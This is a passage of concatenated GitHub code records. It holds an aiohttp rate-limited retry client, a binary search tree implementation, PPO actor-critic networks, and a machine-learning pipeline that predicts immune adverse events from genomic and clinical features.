logger.error(f\"{params.exception}: {params.method} {params.url}\")\n\n\ntrace_config = TraceConfig()\ntrace_config.on_request_end.append(on_request_end)\ntrace_config.on_request_exception.append(on_request_exception)\n\n\nclass RateLimitRetry(ExponentialRetry):\n    def __init__(self, *args, rate_limit_timeout, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self.rate_limit_timeout = 
rate_limit_timeout\n\n    def get_timeout(self, attempt, response, *args, **kwargs):\n        if response is not None and response.status in {408, 429}:\n            self.attempts += 1\n            return self.rate_limit_timeout\n\n        return super().get_timeout(attempt, response, *args, **kwargs)\n\n\nclass RetryClientSession(RetryClient):\n    def __init__(\n        self,\n        base_url=None,\n        *args,\n        connection_limit=None,\n        raise_for_status=True,\n        **kwargs,\n    ):\n        trace_configs = kwargs.pop(\"trace_configs\", [trace_config])\n\n        super().__init__(\n            *args,\n            **kwargs,\n            base_url=base_url,\n            raise_for_status=raise_for_status,\n            trace_configs=trace_configs,\n        )\n\n        if connection_limit is not None:\n            self._client._connector._limit = connection_limit\n\n\nclass RateLimitedRetryClientSession(RateLimiterMixin, RetryClientSession):\n    def __init__(\n        self,\n        *args,\n        attempts=3,\n        connection_limit=None,\n        rate_limit,\n        rate_limit_period=60,\n        start_timeout=0.25,\n        **kwargs,\n    ):\n        super().__init__(\n            *args,\n            **kwargs,\n            client_session=ClientSession(*args, **kwargs),\n            connection_limit=connection_limit,\n            rate_limit=rate_limit,\n            rate_limit_period=rate_limit_period,\n            retry_options=RateLimitRetry(\n                attempts=attempts,\n                evaluate_response_callback=self.response_callback,\n                exceptions={\n                    ClientConnectionError,\n                    ClientPayloadError,\n                    asyncio.TimeoutError,\n                },\n                rate_limit_timeout=rate_limit_period,\n                start_timeout=start_timeout,\n            ),\n        )\n\n        self._client_request = self._client._request\n        self._client._request = self._request\n\n    async def _request(self, *args, **kwargs):\n        async with self._rate_limiter:\n            return await self._client_request(*args, **kwargs)\n\n    async def response_callback(self, response):\n        return response is not None and response.status not in {408, 429}\n","repo_name":"lubo/useful-scripts","sub_path":"bookmarkmgr/bookmarkmgr/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28212072992","text":"class Binary_Node:\n    def __init__(A, x):\n        A.item = x\n        A.left = None\n        A.right = None\n        A.parent = None\n        # A.subtree_update()\n\n    # interesting: A can be used instead of self\n    # __iter__ is not used here?\n    def subtree_iter(A):\n        if A.left:\n            yield from A.left.subtree_iter()\n        yield A\n        if A.right:\n            yield from A.right.subtree_iter()\n\n    def subtree_first(A):\n        if A.left:\n            return A.left.subtree_first()\n        else:\n            return A\n\n    def subtree_last(A):\n        if A.right:\n            return A.right.subtree_last()\n        else:\n            return A\n\n    # apparently returns None when there is none.\n    def successor(A):\n        if A.right:\n            return A.right.subtree_first()\n        while A.parent and (A is A.parent.right):\n            A = A.parent\n        return A.parent\n\n    def predecessor(A):\n        if A.left:\n            return A.left.subtree_last()\n        while A.parent and (A is A.parent.left):\n            A = A.parent\n        return A.parent\n\n    def subtree_insert_before(A, B):\n        if A.left:\n            A = A.left.subtree_last()\n            # note: the parent pointer must be maintained too\n            A.right, B.parent = B, A\n        else:\n            A.left, B.parent = B, A\n        # A.maintain()\n\n    def subtree_insert_after(A, B):\n        if A.right:\n            A = A.right.subtree_first()\n            A.left, B.parent = B, A\n        else:\n            A.right, B.parent = B, A\n        # A.maintain()\n\n    def subtree_delete(A):\n        if A.left or A.right:\n            if A.left:\n                B = A.predecessor()\n            else:\n                B = A.successor()\n            A.item, B.item = B.item, A.item\n            return B.subtree_delete()\n        if A.parent:\n            if A.parent.left is A:\n                A.parent.left = None\n            if A.parent.right is A:\n                A.parent.right = None\n            # A.parent.maintain()\n        return A\n\n\nclass Binary_Tree:\n    def __init__(T, 
Node_Type=Binary_Node):\n        T.root = None\n        T.size = 0\n        T.Node_Type = Node_Type\n\n    def __len__(T):\n        return T.size\n\n    def __iter__(T):\n        if T.root:\n            for A in T.root.subtree_iter():\n                yield A.item\n\n\n# To implement the Set interface with a binary tree, store keys so that traversal order matches key order. The property that keys in the left subtree are smaller and keys in the right subtree are larger is called the Binary Search Tree Property.\n\n\nclass BST_Node(Binary_Node):\n    def subtree_find(A, k):\n        if k < A.item.key:\n            if A.left:\n                return A.left.subtree_find(k)\n        elif k > A.item.key:\n            if A.right:\n                return A.right.subtree_find(k)\n        else:\n            return A\n        return None\n\n    def subtree_find_next(A, k):\n        if A.item.key <= k:\n            if A.right:\n                return A.right.subtree_find_next(k)\n            else:\n                return None\n        elif A.left:\n            B = A.left.subtree_find_next(k)\n            if B:\n                return B\n        return A\n\n    def subtree_find_prev(A, k):\n        if k <= A.item.key:\n            if A.left:\n                return A.left.subtree_find_prev(k)\n            else:\n                return None\n        elif A.right:\n            B = A.right.subtree_find_prev(k)\n            if B:\n                return B\n        return A\n\n    def subtree_insert(A, B):\n        if B.item.key < A.item.key:\n            if A.left:\n                # this one is defined in this class\n                A.left.subtree_insert(B)\n            else:\n                # this one was defined earlier\n                A.subtree_insert_before(B)\n        elif B.item.key > A.item.key:\n            if A.right:\n                A.right.subtree_insert(B)\n            else:\n                A.subtree_insert_after(B)\n        else:\n            A.item = B.item\n\n\nclass Set_Binary_Tree(Binary_Tree):\n    def __init__(self):\n        # oh, so this is how it's done?\n        super().__init__(BST_Node)\n\n    def iter_order(self):\n        yield from self\n\n    def build(self, X):\n        for x in X:\n            self.insert(x)\n\n    def find_min(self):\n        if self.root:\n            return self.root.subtree_first().item\n\n    def find_max(self):\n        if self.root:\n            return self.root.subtree_last().item\n\n    def find(self, k):\n        if self.root:\n            node = self.root.subtree_find(k)\n            if node:\n                return node.item\n\n    def find_next(self, k):\n        if self.root:\n            node = self.root.subtree_find_next(k)\n            if node:\n                return node.item\n\n    def find_prev(self, k):\n        if self.root:\n            node = self.root.subtree_find_prev(k)\n            if node:\n                return node.item\n\n    def insert(self, x):\n        new_node = self.Node_Type(x)\n        if self.root:\n            self.root.subtree_insert(new_node)\n            # the key already exists\n            if new_node.parent is None:\n                return False\n        else:\n            self.root = new_node\n        self.size += 1\n        return True\n\n    def delete(self, k):\n        assert self.root\n        node = self.root.subtree_find(k)\n        assert node\n        ext = node.subtree_delete()\n        if ext.parent is None:\n            self.root = None\n        self.size -= 1\n        return ext.item\n","repo_name":"Yeolyi/blog_src","sub_path":"cs/6.006/src/lecture6/Binary_Tree.py","file_name":"Binary_Tree.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5686801199","text":"\nfrom collections import namedtuple,deque\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ActorNet(nn.Module):\n\n    def __init__(self,state_size,action_size):\n        super(ActorNet, self).__init__()\n        self.fc1 = nn.Linear(state_size, 256)\n        self.fc2 = nn.Linear(256,256)\n        self.mu_head = nn.Linear(256, action_size)\n        self.sigma_head = nn.Linear(256, action_size)\n        self.bn1 = nn.BatchNorm1d(256)\n\n    def forward(self, x):\n        x = F.relu(self.bn1(self.fc1(x)))\n        x = F.relu(self.fc2(x))\n        mu = 2.0 * torch.tanh(self.mu_head(x))\n        sigma = F.softplus(self.sigma_head(x))\n        return (mu, sigma)\n\n\nclass CriticNet(nn.Module):\n\n    def __init__(self,state_size):\n        super(CriticNet, self).__init__()\n        self.fc1 = nn.Linear(state_size, 256)\n        self.fc2 = nn.Linear(256,256)\n        self.v_head = nn.Linear(256, 1)\n        self.bn1 = 
nn.BatchNorm1d(256)\n\n\n def forward(self, x):\n x = F.relu(self.bn1(self.fc1(x)))\n x = F.relu(self.fc2(x))\n state_value = self.v_head(x)\n return state_value\n\n\nclass Memory():\n def __init__(self):\n self.trajectory=[]\n self.Transition = namedtuple('Transition', ['state', 'action', 'prob', 'reward'])\n\n def add(self,state,action,prob,reward):\n # state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.trajectory.append(self.Transition(state,action,prob,reward))\n\n def clean_buffer(self):\n del self.trajectory[:]\n\n def __len__(self):\n return len(self.trajectory)\n\n","repo_name":"Quantum-Cheese/reinforcement_learning_projects","sub_path":"Unity-projects/Reacher/PPO/PPO_utils.py","file_name":"PPO_utils.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"22509910625","text":"# Both XGB and DNN are performed simultaneously\n# parameters : XGB - param_grid, n_jobs, DNN - max_epochs, lrn_rate , Main - # of iter\n## for the integration of various kinds of features\n# refer to https://tutorials.pytorch.kr/beginner/saving_loading_models.html for model save and load\n# refer to https://quokkas.tistory.com/entry/pytorch%EC%97%90%EC%84%9C-EarlyStop-%EC%9D%B4%EC%9A%A9%ED%95%98%EA%B8%B0 for early-stopping\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch as T\nimport sys\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom xgboost import XGBClassifier, XGBRegressor\nfrom xgboost import plot_importance\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, roc_auc_score, auc, f1_score, precision_recall_curve, average_precision_score\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nimport timeit\nfrom pickle import dump\nimport pickle\nimport joblib\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\n################### Functions ######################\n\ndef list2file(lst, fname):\n f = open(fname, \"w\")\n for feat in lst:\n f.write(feat+\"\\n\")\n f.close()\n\ndef scaler(X_train, X_test):\n sc_X = MinMaxScaler(feature_range=(-1, 1))\n array_train = sc_X.fit_transform(X_train)\n array_test = sc_X.transform(X_test)\n X_train_sc = pd.DataFrame(array_train, index=X_train.index, columns=X_train.columns)\n X_test_sc = pd.DataFrame(array_test, index=X_test.index, columns=X_test.columns)\n return X_train_sc, X_test_sc, sc_X\n\ndef scaler_final(X_train):\n sc_X = MinMaxScaler(feature_range=(-1, 1))\n array_train = sc_X.fit_transform(X_train)\n X_train_sc = pd.DataFrame(array_train, index=X_train.index, columns=X_train.columns)\n return X_train_sc, sc_X\n\n### XGB\ndef XGB_main(X, y):\n\txgb = XGBClassifier(objective='binary:logistic', eval_metric='auc', use_label_encoder=False)\n\tclf = RandomizedSearchCV(estimator = xgb, param_distributions = xgb_param_grid, n_iter = 100, cv = stfold, n_jobs = -1)\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### SVM\ndef SVM_main(X, y):\n\tclf = RandomizedSearchCV(estimator = SVC(), param_distributions = 
svm_param_grid, n_iter = 1, cv = stfold, n_jobs = 10, scoring=\"roc_auc\")\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### RF\ndef RF_main(X, y):\n\tclf = RandomizedSearchCV(estimator = RandomForestClassifier(), param_distributions = rf_param_grid, n_iter = 100, cv = stfold, n_jobs = -1, scoring=\"roc_auc\")\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### DNN\nclass Net(T.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.hid1 = T.nn.Linear(num_feat, 4) # Initial : 4-(8-8)-1\n self.hid2 = T.nn.Linear(4, 8)\n self.hid3 = T.nn.Linear(8, 8)\n self.oupt = T.nn.Linear(8, 1)\n T.nn.init.xavier_uniform_(self.hid1.weight)\n T.nn.init.zeros_(self.hid1.bias)\n T.nn.init.xavier_uniform_(self.hid2.weight)\n T.nn.init.zeros_(self.hid2.bias)\n T.nn.init.xavier_uniform_(self.hid3.weight)\n T.nn.init.zeros_(self.hid3.bias)\n T.nn.init.xavier_uniform_(self.oupt.weight)\n T.nn.init.zeros_(self.oupt.bias)\n def forward(self, x):\n z = T.tanh(self.hid1(x))\n z = T.tanh(self.hid2(z))\n z = T.tanh(self.hid3(z))\n z = T.sigmoid(self.oupt(z))\n return z\n\nclass Batcher:\n def __init__(self, num_items, batch_size, seed=0):\n self.indices = np.arange(num_items)\n self.num_items = num_items\n self.batch_size = batch_size\n self.rnd = np.random.RandomState(seed)\n self.rnd.shuffle(self.indices)\n self.ptr = 0\n def __iter__(self):\n return self\n def __next__(self):\n if self.ptr + self.batch_size > self.num_items:\n self.rnd.shuffle(self.indices)\n self.ptr = 0\n raise StopIteration # exit calling for-loop\n else:\n result = self.indices[self.ptr:self.ptr+self.batch_size]\n self.ptr += self.batch_size\n return result\n\nclass EarlyStopping:\n def __init__(self, patience=7, verbose=False, delta=0, path='checkpoint.pt'):\n self.patience = patience\n self.verbose = verbose\n self.counter = 0\n self.best_score = None\n self.early_stop = False\n self.val_loss_min = np.Inf\n self.delta = delta\n self.path = path\n def __call__(self, val_loss, model):\n score = -val_loss\n if self.best_score is None:\n self.best_score = score\n self.save_checkpoint(val_loss, model)\n elif score < self.best_score + self.delta:\n self.counter += 1\n print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\n if self.counter >= self.patience:\n self.early_stop = True\n else:\n self.best_score = score\n self.save_checkpoint(val_loss, model)\n self.counter = 0\n def save_checkpoint(self, val_loss, model):\n if self.verbose:\n print(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). 
Saving model ...')\n T.save(model.state_dict(), self.path)\n self.val_loss_min = val_loss\n\ndef AUC(model, data_x, data_y):\n X = T.Tensor(data_x)\n Y = T.ByteTensor(data_y) # a Tensor of 0s and 1s\n oupt = model(X) # a Tensor of floats\n score = average_precision_score(Y.numpy(), oupt.detach().numpy())\n return score\n\ndef DNN_main(X_train, X_test, y_train, y_test):\n train_losses = []\n valid_losses = []\n avg_train_losses = []\n avg_valid_losses = []\n early_stopping = EarlyStopping(patience = patience, verbose = True)\n # change the data format\n train_x = X_train.to_numpy()\n train_y = y_train.to_numpy().reshape(-1,1)\n test_x = X_test.to_numpy()\n test_y = y_test.to_numpy().reshape(-1,1)\n # building a model\n net = Net()\n net = net.train()\n loss_func = T.nn.BCELoss()\n optimizer = T.optim.Adam(net.parameters(), lr=lrn_rate)\n n_items = len(train_x)\n bat_size = round(n_items/5)\n batcher = Batcher(n_items, bat_size)\n # training\n for epoch in range(1, max_epochs+1):\n print(\"\\nTraining START\")\n for curr_bat in batcher:\n X = T.Tensor(train_x[curr_bat])\n Y = T.Tensor(train_y[curr_bat])\n optimizer.zero_grad()\n oupt = net(X)\n loss_obj = loss_func(oupt, Y)\n loss_obj.backward()\n optimizer.step()\n train_losses.append(loss_obj.item())\n print(\"Training COMPLETE\")\n Auc = AUC(net, train_x, train_y)\n print(\"train ap score = %0.2f%%\" % Auc)\n # evaluation of held-out test set\n net = net.eval()\n X_test = T.Tensor(test_x)\n Y_test = T.Tensor(test_y)\n oupt_test = net(X_test)\n loss_ = loss_func(oupt_test, Y_test)\n valid_losses.append(loss_.item())\n auc = AUC(net, test_x, test_y)\n print(\"test ap score on = %0.2f%%\" % auc)\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n epoch_len = len(str(max_epochs))\n print_msg = (f'[{epoch:>{epoch_len}}/{max_epochs:>{epoch_len}}] ' +\n f'train_loss: {train_loss:.5f} ' +\n f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n early_stopping(valid_loss, net)\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n net.load_state_dict(T.load('checkpoint.pt'))\n return net, avg_train_losses, avg_valid_losses, auc\n\ndef DNN_final_train(X_train, y_train):\n train_losses = []\n avg_train_losses = []\n early_stopping = EarlyStopping(patience = patience, verbose = True)\n # change the data format\n train_x = X_train.to_numpy()\n train_y = y_train.to_numpy().reshape(-1,1)\n # building a model\n net = Net()\n net = net.train()\n loss_func = T.nn.BCELoss()\n optimizer = T.optim.Adam(net.parameters(), lr=lrn_rate)\n n_items = len(train_x)\n bat_size = round(n_items/5)\n batcher = Batcher(n_items, bat_size)\n # training\n for epoch in range(1, max_epochs+1):\n print(\"\\nTraining START\")\n for curr_bat in batcher:\n X = T.Tensor(train_x[curr_bat])\n Y = T.Tensor(train_y[curr_bat])\n optimizer.zero_grad()\n oupt = net(X)\n loss_obj = loss_func(oupt, Y)\n loss_obj.backward()\n optimizer.step()\n train_losses.append(loss_obj.item())\n print(\"Training COMPLETE\")\n Auc = AUC(net, train_x, train_y)\n print(\"train ap score = %0.2f%%\" % Auc)\n train_loss = np.average(train_losses)\n avg_train_losses.append(train_loss)\n epoch_len = len(str(max_epochs))\n print_msg = (f'[{epoch:>{epoch_len}}/{max_epochs:>{epoch_len}}] ' +\n f'train_loss: {train_loss:.5f}')\n print(print_msg)\n # clear lists to track next epoch\n train_losses = []\n return net, 
avg_train_losses, Auc\n\n###########################################\n#### Training data Processing ####\nstart = timeit.default_timer()\nprint(\"\\n\"*5)\nprint(\"#\"*10+\" PROCESS START \"+\"#\"*10)\n\ntype_ = sys.argv[1] # ANY, SKIN, ENDO etc.\nlabmd = sys.argv[2] # all, within, onlyCtr\ncores = int(sys.argv[3])\nn_iter = int(sys.argv[4])\n\n## Inputs\nf_gt = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/VQSR_nonsyn_608_header.txt\"\nf_cli = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat\"\nf_drug = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat_drug2\" ## Mono\nf_lab = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_lab_final\"\nf_hla = \"/home/changhwan/jh_irAE/01_data/Asan_normal_HLA.txt\"\nf_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/02_Asan_cnv_exon_header2.txt\"\n\n## Dataframes for significant feature indexes\nf_snp_cm = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/06_maf_lr_onlyCtr_%s_filt_res_sorted_rsid_proc_clumped_sorted.bed\"%(type_) # for snpid\n#f_snp_cm = \"/home/omics/DATA1/changhwan/Asan_irAE/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/13.ANY_fdr/06_maf_lr_onlyCtr_ANY_filt_res_sorted_rsid_proc_clumped_sorted.bed\"\nf_res_cli = \"/home/changhwan/amc/08.Analysis/33.final/00.clinical/05.analysis_table1_p001.res\"\nf_res_hla = \"/home/changhwan/amc/08.Analysis/33.final/01.hla/05_re_lr_sort_p001.res\"\n#f_res_cm = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/09.merge_res_lr_ap_final.txt\"\nf_res_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/03_cnv_lr_onlyCtr2/03_%s_p001_gene.tsv\"%(type_)\n#f_res_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/03_cnv_lr_onlyCtr2/01_ANY_fdr_filt2.res\"\n\n#### Processing cov df ####\ndf_cli = pd.read_csv(f_cli,sep=\"\\t\",index_col=0)\ndf_drug = pd.read_csv(f_drug, sep=\"\\t\", index_col=0)\ndf_cov = pd.merge(df_cli, df_drug[\"MONO\"], left_index=True, right_index=True)\ndf_cov.Sex = df_cov.Sex - 1\n\ndf_res_cli = pd.read_csv(f_res_cli, sep=\"\\t\")\nlst_cli = df_res_cli.loc[df_res_cli[\"lab\"]==type_,\"feat\"].to_list()\nlst_cli.append(\"Sex\")\nlst_cli.append(\"Age\")\n\ndf_cli_sub = df_cov.loc[df_cov[\"MONO\"]==1,lst_cli]\n\n#### Processing LAB df ####\ndf_lab = pd.read_csv(f_lab, sep=\"\\t\", index_col=0)\ndf_lab_sub = df_lab[type_]\n\n#### Processing HLA dataframe ####\ndf_hla = pd.read_csv(f_hla, sep=\"\\t\", index_col=0, header=None)\nlst_sm = list(df_hla.index)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_hla.index = lst_new\nhla_inc = [1,2,3,4,5,6,7,8,11,12,15,16] # A,B,C,DRB1, DQB1, DPB1\ndf_hla = df_hla.loc[:,hla_inc]\ndf_hla_stacked = df_hla.stack().str.get_dummies().sum(level=0)\n\ndf_res_hla = pd.read_csv(f_res_hla, sep=\"\\t\")\nset_hla = set(df_res_hla.loc[df_res_hla[\"lab\"]==type_,\"hla\"].to_list())\n\ndf_hla_sub = df_hla_stacked[set_hla]\n\n#### Processing CNV dataframe ####\ndf_cnv_tmp = pd.read_csv(f_cnv, sep=\"\\t\",index_col=0)\ndf_cnv = df_cnv_tmp.drop(\"gene\",axis=1)\n## change the format of sample name\nlst_sm = list(df_cnv.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_cnv.columns = lst_new\n\ndf_res_cnv = pd.read_csv(f_res_cnv, sep=\"\\t\")\nset_cnv = set(df_res_cnv[\"cnvID\"].to_list())\ndf_cnv_sub = df_cnv.T[set_cnv]\n\n#### Processing SNP df ####\ndf_gt = pd.read_csv(f_gt, sep=\"\\t\", index_col=0)\ndf_cm = pd.read_csv(f_snp_cm, sep=\"\\t\")\n#df_res_cm = pd.read_csv(f_res_cm, sep=\"\\t\")\n\n## change the format of 
sample name\nlst_sm = list(df_gt.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_gt.columns = lst_new\n\n## change index name of df_snp to CHROM_POS_REF_ALT\ndf_cm[['start','end']] = df_cm[['start','end']].astype(str)\ndf_cm.index = df_cm[['chr','start','ref','alt']].agg('_'.join,axis=1) ## agg !!\ndf_cm.index.name = \"CHROM_POS_REF_ALT\"\nlst_cm = list(df_cm.index)\n\n## check the nSNP with highest auc_test score\n#nsnp_cm = int(df_res_cm.loc[df_res_cm[\"label\"]==type_,\"nSNP_inf\"])\n#lst_cm_sub = lst_cm[:nsnp_cm]\n\ndf_cm_sub = df_gt.loc[lst_cm,:].T\n\n\n#### Merge various kinds of feature dataframes\n\n#dfs = [df_cli_sub, df_hla_sub, df_cnv_sub, df_cm_sub, df_lab_sub]\ndfs = [df_cli_sub, df_hla_sub, df_cm_sub, df_lab_sub]\ndf_merge_tmp = pd.concat(dfs, join=\"inner\", axis=1, sort=True)\ndf_merge = df_merge_tmp.loc[:,df_merge_tmp.describe().loc[\"count\",:]>565].dropna() # 3% cut - Protein\n\nif labmd==\"all\":\n\tdf_merge[type_].replace(2,0, inplace=True)\nelif labmd==\"within\":\n\tdf_merge[type_].replace(0, np.nan, inplace=True)\n\tdf_merge[type_].replace(2,0, inplace=True)\nelse: #\"onlyCtr\"\n\tpass\n\ndf_merge_sub = df_merge.loc[df_merge[type_]!=2,:].dropna()\n\n\n################################ Main #########################\n#### Training and cross-validation... optimization process ####\n\ndf_X = df_merge_sub.drop(type_, axis=1)\ndf_y = df_merge_sub[type_]\n\ndf_X_sc, sc_final = scaler_final(df_X)\n\nlst_feat = list(df_X.columns)\nnum_feat = df_X.shape[1]\n\n#### XGBoost ####\nxgb_param_grid = {\n \"min_child_weight\":[0,1,2],\n \"gamma\":[0,1],\n \"n_estimators\" : [int(x) for x in np.linspace(start=200, stop=1000, num=3)],\n \"max_depth\" : [int(x) for x in np.linspace(start=4, stop=10, num=4)],\n \"learning_rate\" :[0.001, 0.01, 0.1],\n \"alpha\": [0,1],\n \"lambda\" : [1,2],\n \"eta\": [0.01, 0.1, 0.2],\n \"subsample\": [0.5, 1.0],\n \"colsample_bytree\": [0.5, 1.0]}\n\nstfold = StratifiedKFold(n_splits=5)\n\ncv_results_xgb, best_params_xgb, best_score_xgb, best_estimator_xgb = XGB_main(df_X, df_y)\n\nsaved_model_xgb = pickle.dumps(best_estimator_xgb)\n#xgb_from_pickle = pickle.loads(saved_model_xgb)\n#xgb_from_pickle.predict(X)\nf_xgb = open(\"results3_xgb.tsv\",\"w\")\nf_xgb.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_xgb, best_params_xgb, best_score_xgb))\nf_xgb.close()\njoblib.dump(best_estimator_xgb, 'best_estimator3_xgb.pkl')\n#xgb_from_joblib = joblib.load('best_estimator_xgb.pkl') \n#xgb_from_joblib.predict(X)\n#average_precision_score(df_y, xgb_from_joblib.predict(df_X))\n\nprint(\"XGB_Training_Done!!\\n\", flush=True)\n\n#### SVM ####\nsvm_param_grid = {\n\t'C': [0.001, 0.01, 0.1, 1, 10, 100], \n\t'gamma': [0.001, 0.01, 0.1, 1, 10, 100],\n\t'kernel': ['rbf', 'poly', 'sigmoid']}\n\ncv_results_svm, best_params_svm, best_score_svm, best_estimator_svm = SVM_main(df_X_sc, df_y)\nf_svm = open(\"results3_svm.tsv\",\"w\")\nf_svm.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_svm, best_params_svm, best_score_svm))\nf_svm.close()\njoblib.dump(best_estimator_svm, 'best_estimator3_svm.pkl')\n\nprint(\"SVM_Training_Done!!\\n\", flush=True)\n\n#### RF ####\nrf_param_grid = {\n\t'bootstrap': [True, False],\n\t'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n\t'max_features': ['auto', 'sqrt'],\n\t'min_samples_leaf': [1, 2, 4],\n\t'min_samples_split': [2, 5, 10],\n\t'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n\ncv_results_rf, best_params_rf, 
best_score_rf, best_estimator_rf = RF_main(df_X, df_y)\nf_rf = open(\"results3_rf.tsv\",\"w\")\nf_rf.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_rf, best_params_rf, best_score_rf))\nf_rf.close()\njoblib.dump(best_estimator_rf, 'best_estimator3_rf.pkl')\n\nprint(\"RF_Training_Done!!\\n\", flush=True)\n\n\n#### DNN ####\nlrn_rate = 0.001\nmax_epochs = 20\npatience = 5\n\nseed = 8\nX_train, X_test, y_train, y_test = train_test_split(df_X, df_y, test_size=0.2,\\\n random_state=seed, stratify=df_y)\nX_train_sc, X_test_sc, sc_X = scaler(X_train, X_test)\n\n# Training final model with whole dataset ####\ndf_X_sc, sc_final = scaler_final(df_X)\nmodel, train_loss_final, auc_final = DNN_final_train(df_X_sc, df_y)\n\n\n#### Predict new test set #### (n=169)\nindir = \"/home/changhwan/amc/08.Analysis/34.revision/00_inputs/\"\nf2_cnv = indir+\"02_Asan169_cnv_exon_header2.txt\"\nf2_hla = indir+\"Asan169_normal_HLA.txt\"\nf2_gt = indir+\"VQSR_nonsyn_169_header.txt\"\n#f2_cli = \"/home/changhwan/amc/01.Clinial_info/ver14_220419/Processed_metadata_feat\"\nf2_cli = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat\"\n#f2_lab = \"/home/changhwan/amc/01.Clinial_info/ver14_220419/Processed_metadata_lab_final\"\nf2_lab = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_lab_final\"\n\n# snp\ndf2_gt_tmp = pd.read_csv(f2_gt, sep=\"\\t\", index_col=0)\nlst_sm = list(df2_gt_tmp.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_gt_tmp.columns = lst_new\ndf2_gt = df2_gt_tmp.T\n\n# cnv\ndf2_cnv_tmp = pd.read_csv(f2_cnv, sep=\"\\t\",index_col=0)\ndf2_cnv_tmp = df2_cnv_tmp.drop(\"gene\",axis=1)\n# change the format of sample name\nlst_sm = list(df2_cnv_tmp.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_cnv_tmp.columns = lst_new\ndf2_cnv = df2_cnv_tmp.T\nlst_sm2 = list(df2_cnv.index)\n\n# lab\ndf2_lab = pd.read_csv(f2_lab, sep=\"\\t\", index_col=0)\nlst_sm_lab = list(df2_lab.index)\nlst_final = list(set(lst_sm2) & set(lst_sm_lab))\ndf2_lab_sub = df2_lab.loc[lst_final, type_]\n\n# hla\ndf2_hla = pd.read_csv(f2_hla, sep=\"\\t\", index_col=0, header=None)\nlst_sm = list(df2_hla.index)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_hla.index = lst_new\n#hla_inc = [3,4,7,8,11,12,15,16] # B,C,DRB1,DQB1,DPB1 => B,DRB1, DQB1, DPB1\nhla_inc = [1,2,3,4,5,6,7,8,11,12,15,16] # A,B,C,DRB1, DQB1, DPB1\ndf2_hla = df2_hla.loc[:,hla_inc]\ndf2_hla_stacked = df2_hla.stack().str.get_dummies().sum(level=0)\n\n# cli\ndf2_cli = pd.read_csv(f2_cli, sep=\"\\t\", index_col=0)\ndf2_cov = pd.merge(df2_cli, df_drug[\"MONO\"], left_index=True, right_index=True)\ndf2_cov.Sex = df2_cov.Sex - 1\n\n# merge\n#dfs2 = [df2_cov, df2_hla_stacked, df2_cnv, df2_gt, df2_lab_sub]\ndfs2 = [df2_cov, df2_hla_stacked, df2_gt, df2_lab_sub]\ndf2_merge_tmp = 